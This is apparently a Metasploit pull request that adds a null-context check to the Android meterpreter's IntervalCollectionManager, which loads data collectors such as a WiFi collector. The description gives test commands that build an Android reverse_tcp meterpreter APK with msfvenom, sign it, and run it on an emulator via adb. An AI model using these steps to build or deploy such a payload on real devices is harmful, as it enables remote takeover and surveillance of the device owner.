### PR TITLE
fix running without context

### DIFF
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/IntervalCollectionManager.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/IntervalCollectionManager.java
@@ -51,6 +51,9 @@ public class IntervalCollectionManager {
     }
 
     private void loadExistingCollectors() {
+        if (context == null) {
+            return;
+        }
         IntervalCollector collector = null;
 
         collector = new WifiCollector(COLLECT_TYPE_WIFI, this.context);


### PR DESCRIPTION
This change fixes https://github.com/rapid7/metasploit-framework/issues/6002
You can test this change on an emulator like so:
```
   ./msfvenom -p android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o "$1"
    jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA android.apk androiddebugkey
    adb shell mkdir /data/local/tmp/test
    adb push android.apk /data/local/tmp/test
    adb shell "cd /data/local/tmp/test; chmod 766 android.apk; dalvikvm -Xbootclasspath:/system/framework/core.jar -cp android.apk com.metasploit.stage.Payload"